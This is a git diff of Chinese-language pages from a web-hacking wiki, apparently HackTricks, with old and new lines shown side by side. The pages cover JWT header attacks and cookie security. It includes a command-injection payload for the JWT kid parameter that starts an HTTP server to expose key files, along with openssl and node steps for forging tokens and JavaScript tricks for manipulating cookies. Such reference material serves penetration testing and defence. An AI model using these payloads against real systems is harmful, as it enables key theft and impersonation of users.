`kid`参数指定的文件路径在命令执行上下文中使用的场景可能导致远程代码执行RCE漏洞。通过在`kid`参数中注入命令可以暴露私钥。一个实现RCE和密钥暴露的示例有效负载是:
`/root/res/keys/secret7.key; cd /root/res/keys/ && python -m SimpleHTTPServer 1337&`
@ -145,17 +146,17 @@ python3 jwt_tool.py <JWT> -I -hc kid -hv "../../dev/null" -S hs256 -p ""
#### jku
jku代表**JWK Set URL**。\
如果令牌使用“**jku**” **Header**声明,则**检查提供的URL**。这应该指向包含用于验证令牌的公钥的JWKS文件的URL。篡改令牌以将jku值指向您可以监视流量的Web服务。
如果令牌使用“**jku**”**头部**声明,则**检查提供的URL**。这应该指向一个包含JWKS文件的URL该文件持有用于验证令牌的公钥。篡改令牌以将jku值指向您可以监控流量的Web服务。
首先,您需要使用新的私钥和公钥创建新证书
首先,您需要创建一个新的证书,带有新的私钥和公钥
```bash
openssl genrsa -out keypair.pem 2048
openssl rsa -in keypair.pem -pubout -out publickey.crt
openssl pkcs8 -topk8 -inform PEM -outform PEM -nocrypt -in keypair.pem -out pkcs8.key
```
然后,您可以使用例如[**jwt.io**](https://jwt.io)来使用**创建的公钥和私钥并将参数jku指向创建的证书**来创建新的JWT。为了创建有效的jku证书,您可以下载原始证书并更改所需的参数。
然后您可以使用例如 [**jwt.io**](https://jwt.io) 来创建新的 JWT使用 **创建的公钥和私钥,并将参数 jku 指向创建的证书。** 为了创建有效的 jku 证书,您可以下载原始证书并更改所需的参数。
您可以从公钥证书中获取参数"e"和"n"
您可以使用以下方法从公钥证书中获取参数 "e" "n"
```bash
from Crypto.PublicKey import RSA
fp = open("publickey.crt", "r")
@ -166,39 +167,39 @@ print("e:", hex(key.e))
```
#### x5u
X.509 URL。指向一组以 PEM 格式编码的 X.509(证书格式标准)公共证书的 URI。该组中的第一个证书必须是用于签署此 JWT 的证书。随后的每个证书都会签署前一个证书从而完成证书链。X.509 在 RFC 52807 中定义。需要传输安全性来传输证书
X.509 URL。指向一组以 PEM 格式编码的 X.509(证书格式标准)公共证书的 URI。该集合中的第一个证书必须是用于签署此 JWT 的证书。后续证书每个都签署前一个证书从而完成证书链。X.509 在 RFC 52807 中定义。传输安全性是传输证书所必需的
尝试**将此头更改为您控制的 URL**并检查是否收到任何请求。在这种情况下,您**可以篡改 JWT**。
尝试**将此头更改为您控制的 URL**并检查是否收到任何请求。在这种情况下,您**可以篡改 JWT**。
要使用您控制的证书伪造新令牌,您需要创建证书并提取公钥和私钥:
要使用您控制的证书伪造新令牌,您需要创建证书并提取公钥和私钥:
```bash
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout attacker.key -out attacker.crt
openssl x509 -pubkey -noout -in attacker.crt > publicKey.pem
```
然后,您可以使用例如 [**jwt.io**](https://jwt.io) 来使用**创建的公钥和私钥,并将参数 x5u 指向创建的证书 .crt** 来创建新的 JWT。
然后可以使用例如 [**jwt.io**](https://jwt.io) 来创建新的 JWT使用 **创建的公钥和私钥,并将参数 x5u 指向创建的 .crt 证书。**
![](<../.gitbook/assets/image (956).png>)
您还可以滥用这两个漏洞**用于 SSRF 攻击**
你也可以利用这两个漏洞 **进行 SSRF**
#### x5c
此参数可能包含**以 base64 编码的证书**
该参数可能包含 **以 base64 编码的证书**
![](<../.gitbook/assets/image (1119).png>)
如果攻击者**生成自签名证书**,并使用相应的私钥创建伪造令牌,然后替换 "x5c" 参数的值为新生成的证书,并修改其他参数,即 n、e 和 x5t那么伪造的令牌基本上将被服务器接受。
如果攻击者 **生成一个自签名证书** 并使用相应的私钥创建一个伪造的令牌,并将 "x5c" 参数的值替换为新生成的证书,并修改其他参数,即 n、e 和 x5t那么基本上伪造的令牌将被服务器接受。
```bash
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout attacker.key -outattacker.crt
openssl x509 -in attacker.crt -text
```
### 嵌入式公钥 (CVE-2018-0114)
如果 JWT 嵌入了一个公钥,就像下面的情况一样
如果JWT嵌入了公钥如下场景所示
![](<../.gitbook/assets/image (624).png>)
使用以下的 nodejs 脚本可以从这些数据中生成一个公钥:
使用以下nodejs脚本可以从该数据生成公钥:
```bash
const NodeRSA = require('node-rsa');
const fs = require('fs');
@ -208,13 +209,13 @@ const key = new NodeRSA();
var importedKey = key.importKey({n: Buffer.from(n, 'base64'),e: Buffer.from(e, 'base64'),}, 'components-public');
console.log(importedKey.exportKey("public"));
```
可以生成一个新的私钥/公钥,将新的公钥嵌入令牌中,并使用它生成一个新的签名:
可以生成一个新的私钥/公钥,将新的公钥嵌入令牌中,并用它生成新的签名:
```bash
openssl genrsa -out keypair.pem 2048
openssl rsa -in keypair.pem -pubout -out publickey.crt
openssl pkcs8 -topk8 -inform PEM -outform PEM -nocrypt -in keypair.pem -out pkcs8.key
```
您可以使用以下 Node.js 脚本获取 "n" 和 "e"
您可以使用此 nodejs 脚本获取 "n" 和 "e"
```bash
const NodeRSA = require('node-rsa');
const fs = require('fs');
@ -224,16 +225,18 @@ const publicComponents = key.exportKey('components-public');
console.log('Parameter n: ', publicComponents.n.toString("hex"));
console.log('Parameter e: ', publicComponents.e.toString(16));
```
### ES256: 使用相同的nonce揭示私钥
最终使用公钥和私钥以及新的“n”和“e”值您可以使用 [jwt.io](https://jwt.io) 伪造一个包含任何信息的新有效JWT。
如果某些应用程序使用ES256并使用相同的nonce生成两个JWT私钥可以被恢复。
### ES256使用相同的随机数泄露私钥
这里有一个例子:[ECDSA: 如果使用相同的nonce则揭示私钥使用SECP256k1](https://asecuritysite.com/encryption/ecd5)
如果某些应用程序使用ES256并使用相同的随机数生成两个jwt则可以恢复私钥。
这是一个示例:[ECDSA如果使用相同的随机数与SECP256k1泄露私钥](https://asecuritysite.com/encryption/ecd5)
### JTI (JWT ID)
JTIJWT ID声明为JWT令牌提供了一个唯一标识符。它可用于防止令牌被重放。\
然而,想象一种情况,ID的最大长度为40001-9999。请求0001和10001将使用相同的ID。因此如果后端在每个请求中递增ID您可以滥用此功能来**重放请求**需要在每次成功重放之间发送10000个请求
JTI (JWT ID) 声明为JWT令牌提供了唯一标识符。它可以用于防止令牌被重放。\
然而,想象一下一个情况,其中ID的最大长度为40001-9999。请求0001和10001将使用相同的ID。因此如果后端在每个请求中递增ID您可以利用这一点来**重放请求**需要在每次成功重放之间发送10000个请求
### JWT注册声明
@ -243,15 +246,15 @@ JTIJWT ID声明为JWT令牌提供了一个唯一标识符。它可用于
**跨服务中继攻击**
已经观察到一些Web应用程序依赖于受信任的JWT服务来生成和管理它们的令牌。已记录到一个客户端的JWT服务为另一个客户端生成的令牌被接受的情况。如果观察到通过第三方服务颁发或更新JWT,则应调查使用相同用户名/电子邮件在该服务的另一个客户端上注册帐户的可能性。然后应尝试在请求目标时重放获得的令牌,以查看是否被接受。
已经观察到一些Web应用程序依赖于受信任的JWT服务来生成和管理其令牌。记录到的实例表明由JWT服务为一个客户端生成的令牌被同一JWT服务的另一个客户端接受。如果通过第三方服务观察到JWT的发行或续订,则应调查使用相同用户名/电子邮件在该服务的另一个客户端上注册帐户的可能性。然后应尝试在请求重放获得的令牌,以查看是否被接受。
* 令牌被接受可能表示存在严重问题,可能允许欺骗任何用户帐户。但应注意,如果在第三方应用程序上注册,可能需要更广泛的测试权限,因为这可能涉及法律灰色地带。
* 如果您的令牌被接受,可能表明存在一个关键问题,这可能允许伪造任何用户的帐户。然而,需要注意的是,如果在第三方应用程序上注册,可能需要更广泛测试的权限,因为这可能进入法律灰色地带。
**令牌期检查**
**令牌的过期检查**
使用“exp”有效载荷声明检查令牌的到期时间。鉴于JWT通常在没有会话信息的情况下使用需要谨慎处理。在许多情况下捕获并重放另一个用户的JWT可能会启用对该用户的冒充。JWT RFC建议通过利用“exp”声明为令牌设置到期时间来减轻JWT重放攻击。此外应用程序实施相关检查以确保处理此值并拒绝过期令牌的处理至关重要。如果令牌包含“exp”声明并且测试时间允许建议存储令牌并在到期时间过去后重放它。可以使用jwt_tool的-R标志读取令牌的内容包括时间戳解析和到期检查时间戳为UTC时间)。
使用“exp”有效负载声明检查令牌的过期。鉴于JWT通常在没有会话信息的情况下使用因此需要小心处理。在许多情况下捕获和重放另一个用户的JWT可能会使该用户冒充。JWT RFC建议通过利用“exp”声明为令牌设置过期时间来减轻JWT重放攻击。此外应用程序实施相关检查以确保处理此值并拒绝过期令牌至关重要。如果令牌包含“exp”声明并且测试时间限制允许建议存储令牌并在过期时间过后重放。可以使用jwt_tool的-R标志读取令牌的内容包括时间戳解析和过期检查UTC中的时间戳)。
* 如果应用程序仍然验证令牌,可能存在安全风险,因为这可能意味着令牌永远不会过期。
* 如果应用程序仍然验证令牌,可能存在安全风险,因为这可能意味着令牌永远不会过期。
### 工具
@ -259,20 +262,21 @@ JTIJWT ID声明为JWT令牌提供了一个唯一标识符。它可用于
<figure><img src="../.gitbook/assets/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
如果您对**黑客职业**感兴趣并想黑掉无法黑掉的 - **我们正在招聘!**(需要流利的波兰语书面和口头表达能力)。
如果您对**黑客职业**感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!**_需要流利的波兰语书面和口语能力_)。
{% embed url="https://www.stmcyber.com/careers" %}
{% hint style="success" %}
学习和实践AWS黑客技术<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家ARTE**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践GCP黑客技术<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家GRTE**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub库提交PR分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,18 +1,19 @@
# Cookies Hacking
{% hint style="success" %}
学习和实践 AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
**Try Hard Security Group**
@ -22,116 +23,118 @@
***
## Cookie属性
## Cookie 属性
Cookie带有几个属性,控制它们在用户浏览器中的行为。以下是这些属性的概述,使用更加被动的语气
Cookies 具有多个属性,控制其在用户浏览器中的行为。以下是这些属性的简要说明
### 过期时间和Max-Age
### Expires 和 Max-Age
Cookie的过期日期由`Expires`属性确定。相反,`Max-age`属性定义了直到删除Cookie的时间以秒为单位。**选择`Max-age`,因为它反映了更现代的实践。**
Cookie 的过期日期由 `Expires` 属性决定。相反,`Max-age` 属性定义了在删除 Cookie 之前的秒数。**选择 `Max-age`,因为它反映了更现代的做法。**
###
### Domain
`Domain`属性指定接收Cookie的主机。默认情况下这设置为发出Cookie的主机不包括其子域。但是当显式设置`Domain`属性时,它也包括子域。这使得指定`Domain`属性成为一个不太限制的选项适用于需要在子域之间共享Cookie的情况。例如设置`Domain=mozilla.org`使得Cookie可以在其子域如`developer.mozilla.org`)上访问。
接收 Cookie 的主机由 `Domain` 属性指定。默认情况下,这设置为发出 Cookie 的主机,不包括其子域。然而,当 `Domain` 属性被显式设置时,它也包括子域。这使得 `Domain` 属性的指定成为一个不那么严格的选项,适用于需要跨子域共享 Cookie 的场景。例如,设置 `Domain=mozilla.org` 使得其子域如 `developer.mozilla.org` 上的 Cookie 可访问。
### 路径
### Path
`Path`属性指示必须在请求的URL中存在的特定URL路径以便发送`Cookie`头。该属性将`/`字符视为目录分隔符,允许在子目录中进行匹配。
`Path` 属性指示必须在请求的 URL 中存在的特定 URL 路径,以便发送 `Cookie` 头。此属性将 `/` 字符视为目录分隔符,允许在子目录中匹配。
### 排序规则
### Ordering Rules
当两个Cookie具有相同名称时选择发送的Cookie基于
当两个 Cookie 具有相同名称时,选择发送的 Cookie 基于:
* 请求URL中匹配最长路径的Cookie。
* 如果路径相同则选择最近设置的Cookie。
* 请求URL 中最长路径匹配 Cookie。
* 如果路径相同,则选择最近设置的 Cookie。
### SameSite
* `SameSite`属性规定了是否在来自第三方域的请求上发送Cookie。它提供三种设置
* **Strict**限制Cookie在第三方请求上发送。
* **Lax**允许Cookie在由第三方网站发起的GET请求中发送。
* **None**允许从任何第三方域发送Cookie
* `SameSite` 属性决定是否在来自第三方域的请求中发送 Cookie。它提供三种设置
* **Strict**: 限制 Cookie 在第三方请求中发送。
* **Lax**: 允许 Cookie 与由第三方网站发起的 GET 请求一起发送。
* **None**: 允许 Cookie 从任何第三方域发送
请记住,在配置Cookie时了解这些属性可以帮助确保它们在不同情况下的行为符合预期
请记住,在配置 Cookie 时,理解这些属性可以帮助确保它们在不同场景中按预期行为
| **请求类型** | **示例代码** | **发送Cookie的情况** |
| **请求类型** | **示例代码** | **发送 Cookie 的条件** |
| ---------------- | ---------------------------------- | --------------------- |
| 链接 | \<a href="...">\</a> | NotSet\*, Lax, None |
| 预渲染 | \<link rel="prerender" href=".."/> | NotSet\*, Lax, None |
| 表单 GET | \<form method="GET" action="..."> | NotSet\*, Lax, None |
| 表单 POST | \<form method="POST" action="..."> | NotSet\*, None |
| Link | \<a href="...">\</a> | NotSet\*, Lax, None |
| Prerender | \<link rel="prerender" href=".."/> | NotSet\*, Lax, None |
| Form GET | \<form method="GET" action="..."> | NotSet\*, Lax, None |
| Form POST | \<form method="POST" action="..."> | NotSet\*, None |
| iframe | \<iframe src="...">\</iframe> | NotSet\*, None |
| AJAX | $.get("...") | NotSet\*, None |
| 图片 | \<img src="..."> | NetSet\*, None |
| Image | \<img src="..."> | NetSet\*, None |
表格来源于[Invicti](https://www.netsparker.com/blog/web-security/same-site-cookie-attribute-prevent-cross-site-request-forgery/),稍作修改。带有**SameSite**属性的Cookie将**减轻需要登录会话的CSRF攻击**。
表格来自 [Invicti](https://www.netsparker.com/blog/web-security/same-site-cookie-attribute-prevent-cross-site-request-forgery/) 并稍作修改。\
具有 _**SameSite**_ 属性的 Cookie 将 **减轻 CSRF 攻击**,其中需要登录会话。
**\*请注意,从Chrome802019年2月开始没有Cookie SameSite属性的Cookie的默认行为将是lax** ([https://www.troyhunt.com/promiscuous-cookies-and-their-impending-death-via-the-samesite-policy/](https://www.troyhunt.com/promiscuous-cookies-and-their-impending-death-via-the-samesite-policy/))\
请注意,临时在应用此更改后Chrome中**没有SameSite策略的Cookie**在**前2分钟内将被视为None**然后在顶级跨站点POST请求中将被视为Lax。
**\*请注意,从 Chrome802019年2月开始未设置 Cookie SameSite 属性的 Cookie 的默认行为将为 Lax** ([https://www.troyhunt.com/promiscuous-cookies-and-their-impending-death-via-the-samesite-policy/](https://www.troyhunt.com/promiscuous-cookies-and-their-impending-death-via-the-samesite-policy/)).\
请注意,临时情况下在应用此更改后Chrome 中 **没有 SameSite** **策略的 Cookie 将在 **前 2 分钟内被 **视为 None**,然后在顶级跨站点 POST 请求中视为 Lax。**
## Cookies标志
## Cookies 标志
### HttpOnly
可以防止**客户端**访问Cookie例如通过**Javascript**`document.cookie`
避免了 **客户端** 访问 Cookie例如通过 **Javascript**: `document.cookie`
#### **绕过方式**
#### **绕过**
* 如果页面**将Cookie作为响应发送**(例如在**PHPinfo**页面中可以滥用XSS发送请求到该页面并从响应中**窃取Cookie**(在[https://hackcommander.github.io/posts/2022/11/12/bypass-httponly-via-php-info-page/](https://hackcommander.github.io/posts/2022/11/12/bypass-httponly-via-php-info-page/)中查看示例)。
* 可以通过**TRACE HTTP**请求绕过,因为服务器的响应将反映发送的Cookie。这种技术称为**跨站点跟踪**
* 现代浏览器通过不允许从JS发送TRACE请求来避免此技术。然而已经在特定软件中找到了一些绕过方法比如向IE6.0 SP2发送`\r\nTRACE`而不是`TRACE`
* 另一种方法是利用浏览器的零/日漏洞。
* 可以通过执行Cookie Jar溢出攻击来**覆盖HttpOnly Cookie**
* 如果页面 **将 Cookie 作为请求的响应发送**(例如在 **PHPinfo** 页面中),可以利用 XSS 发送请求到此页面并 **窃取响应中的 Cookie**(请查看 [https://hackcommander.github.io/posts/2022/11/12/bypass-httponly-via-php-info-page/](https://hackcommander.github.io/posts/2022/11/12/bypass-httponly-via-php-info-page/) 中的示例)。
* 可以通过 **TRACE** **HTTP** 请求绕过,因为服务器的响应将反映发送的 Cookie如果此 HTTP 方法可用)。此技术称为 **跨站点跟踪**
* 现代浏览器通过不允许从 JS 发送 TRACE 请求来避免此技术。然而,在特定软件中发现了一些绕过方法,例如向 IE6.0 SP2 发送 `\r\nTRACE` 而不是 `TRACE`
* 另一种方法是利用浏览器的零日漏洞。
* 通过执行 Cookie Jar 溢出攻击,可以 **覆盖 HttpOnly Cookie**
{% content-ref url="cookie-jar-overflow.md" %}
[cookie-jar-overflow.md](cookie-jar-overflow.md)
{% endcontent-ref %}
* 可以使用[**Cookie Smuggling**](./#cookie-smuggling)攻击来外泄这些Cookie
* 可以使用 [**Cookie Smuggling**](./#cookie-smuggling) 攻击来外泄这些 Cookie
### Secure
只有在通过安全通道传输请求时(通常是**HTTPS**),请求才会发送Cookie。
请求将 **仅** 在通过安全通道(通常是 **HTTPS**)传输时发送 Cookie。
## Cookies前缀
## Cookies 前缀
`__Secure-`为前缀的Cookie需要与受HTTPS保护的页面一起设置`secure`标志
`__Secure-` 开头的 Cookie 必须与通过 HTTPS 保护的页面的 `secure` 标志一起设置
对于以`__Host-`为前缀的Cookie必须满足几个条件:
对于以 `__Host-` 开头的 Cookie必须满足以下几个条件:
* 必须使用`secure`标志设置
* 必须来自通过HTTPS保护的页面。
* 不能指定域,防止将其传输到子域。
* 这些Cookie的路径必须设置为`/`。
* 必须设置 `secure` 标志
* 必须来自通过 HTTPS 保护的页面。
* 禁止指定域,防止其传输到子域。
* 这些 Cookie 的路径必须设置为 `/`
重要的是要注意,以`__Host-`为前缀的Cookie不允许发送到超级域或子域。这种限制有助于隔离应用程序Cookie。因此将`__Host-`前缀用于所有应用程序Cookie可以被视为增强安全性和隔离的良好实践。
### 覆盖 cookies
重要的是要注意,以 `__Host-` 开头的 Cookie 不允许发送到超级域或子域。此限制有助于隔离应用程序 Cookie。因此使用 `__Host-` 前缀为所有应用程序 Cookie 是增强安全性和隔离性的良好做法。
因此,`__Host-` 前缀的 cookie 之一的保护措施是防止它们被子域覆盖。例如,防止 [**Cookie Tossing 攻击**](cookie-tossing.md)。在演讲 [**Cookie Crumbles: Unveiling Web Session Integrity Vulnerabilities**](https://www.youtube.com/watch?v=F\_wAzF4a7Xg) ([**paper**](https://www.usenix.org/system/files/usenixsecurity23-squarcina.pdf)) 中提到,可以通过欺骗解析器来设置来自子域的 \_\_HOST- 前缀的 cookie例如在开头或开头和结尾添加 "="
### 覆盖 Cookie
因此,`__Host-` 前缀 Cookie 的保护之一是防止它们被子域覆盖。例如,防止 [**Cookie Tossing 攻击**](cookie-tossing.md)。在演讲 [**Cookie Crumbles: Unveiling Web Session Integrity Vulnerabilities**](https://www.youtube.com/watch?v=F\_wAzF4a7Xg) ([**论文**](https://www.usenix.org/system/files/usenixsecurity23-squarcina.pdf)) 中,展示了通过欺骗解析器,可以从子域设置 \_\_HOST- 前缀的 Cookie例如在开头或结尾添加 "="
<figure><img src="../../.gitbook/assets/image (6) (1).png" alt=""><figcaption></figcaption></figure>
或者在 PHP 中,可以在 cookie 名称的开头添加**其他字符**,这些字符将被**下划线字符替换**,从而允许覆盖 `__HOST-` cookies
或者在 PHP 中,可以在 Cookie 名称的 **开头添加其他字符**,这些字符将被 **替换为下划线** 字符,从而允许覆盖 `__HOST-` Cookie
<figure><img src="../../.gitbook/assets/image (7) (1).png" alt="" width="373"><figcaption></figcaption></figure>
## Cookies 攻击
如果自定义 cookie 包含敏感数据,请检查它(特别是在参加 CTF 时),因为它可能存在漏洞。
如果自定义 Cookie 包含敏感数据,请检查它(特别是如果您正在进行 CTF),因为它可能存在漏洞。
### 解码和操纵 Cookies
应始终仔细审查嵌入在 cookie 中的敏感数据。经过 Base64 或类似格式编码的 cookie 通常可以解码。这种漏洞允许攻击者更改 cookie 的内容,并通过将修改后的数据重新编码到 cookie 中来冒充其他用户。
嵌入 Cookie 的敏感数据应始终受到审查。以 Base64 或类似格式编码的 Cookie 通常可以被解码。这种漏洞允许攻击者更改 Cookie 的内容,并通过将其修改后的数据重新编码回 Cookie 来冒充其他用户。
### 会话劫持
此攻击涉及窃取用户的 cookie 以未经授权地访问应用程序中的帐户。通过使用窃取的 cookie攻击者可以冒充合法用户。
此攻击涉及窃取用户的 Cookie以获得对其在应用程序中的帐户的未经授权访问。通过使用被盗的 Cookie攻击者可以冒充合法用户。
### 会话固定
在这种情况下,攻击者欺骗受害者使用特定的 cookie 登录。如果应用程序在登录时不分配新的 cookie则拥有原始 cookie 的攻击者可以冒充受害者。这种技术依赖于受害者使用攻击者提供的 cookie 登录。
在这种情况下,攻击者诱使受害者使用特定的 Cookie 登录。如果应用程序在登录时不分配新的 Cookie攻击者就可以使用原始 Cookie 冒充受害者。此技术依赖于受害者使用攻击者提供的 Cookie 登录。
如果在子域中发现了 **XSS** 或**控制一个子域**,请阅读:
如果 **子域中发现了 XSS** 或您 **控制一个子域**,请阅读:
{% content-ref url="cookie-tossing.md" %}
[cookie-tossing.md](cookie-tossing.md)
@ -139,9 +142,9 @@ Cookie的过期日期由`Expires`属性确定。相反,`Max-age`属性定义
### 会话捐赠
在这种情况下,攻击者说服受害者使用攻击者的会话 cookie。受害者相信他们已登录到自己的帐户中将无意中在攻击者的帐户上执行操作。
在这里,攻击者说服受害者使用攻击者的会话 Cookie。受害者相信他们已登录自己的帐户将无意中在攻击者的帐户上下文中执行操作。
如果在子域中发现了 **XSS** 或**控制一个子域**,请阅读:
如果 **子域中发现了 XSS** 或您 **控制一个子域**,请阅读:
{% content-ref url="cookie-tossing.md" %}
[cookie-tossing.md](cookie-tossing.md)
@ -149,23 +152,23 @@ Cookie的过期日期由`Expires`属性确定。相反,`Max-age`属性定义
### [JWT Cookies](../hacking-jwt-json-web-tokens.md)
单击上面的链接以访问解释 JWT 中可能存在的缺陷的页面。
点击上面的链接访问解释 JWT 可能存在缺陷的页面。
在 cookie 中使用的 JSON Web Tokens (JWT) 也可能存在漏洞。建议访问有关如何利用这些潜在缺陷的详细信息的链接文档,以获取深入信息
用于 Cookie 的 JSON Web Tokens (JWT) 也可能存在漏洞。有关潜在缺陷及其利用方法的深入信息,建议访问有关黑客 JWT 的链接文档
### 跨站请求伪造 (CSRF)
此攻击强制已登录用户在当前已认证的 Web 应用程序上执行不需要的操作。攻击者可以利用自动发送到易受攻击站点的每个请求的 cookie。
此攻击迫使已登录用户在他们当前已认证的 Web 应用程序上执行不必要的操作。攻击者可以利用自动随每个请求发送到易受攻击站点的 Cookie。
### 空 cookie
### 空 Cookie
(查看[原始研究](https://blog.ankursundara.com/cookie-bugs/)中的更多详细信息)浏览器允许创建没有名称的 cookie可以通过 JavaScript 来演示。
查看[原始研究](https://blog.ankursundara.com/cookie-bugs/)中的更多详细信息)浏览器允许创建没有名称的 Cookie这可以通过 JavaScript 进行演示,如下所示:
```js
document.cookie = "a=v1"
document.cookie = "=test value;" // Setting an empty named cookie
document.cookie = "b=v2"
```
发送的 cookie 头中的结果`a=v1; test value; b=v2;`。有趣的是,如果设置了一个空名称 cookie就可以操纵 cookie通过将空 cookie 设置为特定值,潜在地控制其他 cookie
结果在发送的 cookie 头中是 `a=v1; test value; b=v2;`。有趣的是,如果设置了一个空名称的 cookie这允许对 cookies 进行操控,通过将空 cookie 设置为特定值,可能控制其他 cookies
```js
function setCookie(name, value) {
document.cookie = `${name}=${value}`;
@ -173,51 +176,53 @@ document.cookie = `${name}=${value}`;
setCookie("", "a=b"); // Setting the empty cookie modifies another cookie's value
```
这导致浏览器发送一个 cookie 头,每个 web 服务器将其解释为名为 `a`,值为 `b` 的 cookie。
#### Chrome Bug: Unicode Surrogate Codepoint Issue
在 Chrome 中,如果一个 Unicode 代理码点是一个设置的 cookie 的一部分,`document.cookie` 就会变得损坏,随后返回一个空字符串:
在 Chrome 中,如果 Unicode 代理码点是设置的 cookie 的一部分,`document.cookie` 变得损坏,随后返回一个空字符串:
```js
document.cookie = "\ud800=meep";
```
这导致 `document.cookie` 输出一个空字符串,表明永久性损坏。
#### 由于解析问题导致的Cookie走私
#### 由于解析问题导致的 Cookie 走私
查看[原始研究](https://blog.ankursundara.com/cookie-bugs/)中的更多细节包括JavaJettyTomCatUndertow和PythonZopecherrypyweb.pyaiohttpbottlewebob在内的几个Web服务器由于过时的RFC2965支持而错误处理Cookie字符串。即使包含分号它们也会将双引号括起的Cookie值读取为单个值而分号通常应该分隔键值对:
(查看[原始研究](https://blog.ankursundara.com/cookie-bugs/)的更多细节)包括 JavaJetty、TomCat、Undertow和 PythonZope、cherrypy、web.py、aiohttp、bottle、webob在内的多个网络服务器由于对过时的 RFC2965 支持,错误处理 cookie 字符串。它们将双引号括起来的 cookie 值视为单个值,即使它包含分号,而分号通常应分隔键值对:
```
RENDER_TEXT="hello world; JSESSIONID=13371337; ASDF=end";
```
#### Cookie注入漏洞
#### Cookie Injection Vulnerabilities
(查看[原始研究](https://blog.ankursundara.com/cookie-bugs/)中的更多细节服务器尤其是Undertow、Zope以及使用Python的`http.cookie.SimpleCookie`和`http.cookie.BaseCookie`对cookie的解析不正确为cookie注入攻击创造了机会。这些服务器未能正确界定新cookie的开始允许攻击者伪造cookie
(查看[原始研究](https://blog.ankursundara.com/cookie-bugs/)的更多细节) 服务器对 cookies 的错误解析,特别是 Undertow、Zope 以及使用 Python 的 `http.cookie.SimpleCookie``http.cookie.BaseCookie` 的服务器,创造了 cookie 注入攻击的机会。这些服务器未能正确分隔新 cookie 的开始,允许攻击者伪造 cookies
- Undertow期望在带引号的值后立即出现新cookie而无需分号。
- Zope寻找逗号来开始解析下一个cookie。
- Python的cookie类在空格字符上开始解析。
* Undertow 期望在带引号的值后立即出现新 cookie而不需要分号。
* Zope 寻找逗号以开始解析下一个 cookie。
* Python 的 cookie 类在空格字符上开始解析。
这种漏洞在依赖基于cookie的CSRF保护的Web应用程序中尤为危险因为它允许攻击者注入伪造的CSRF令牌cookie可能绕过安全措施。问题在于Python处理重复cookie名称时存在漏洞最后出现的覆盖先前的。它还引发了对不安全环境中`__Secure-`和`__Host-` cookie的担忧并且当cookie传递给易受伪造攻击的后端服务器时可能导致授权绕过
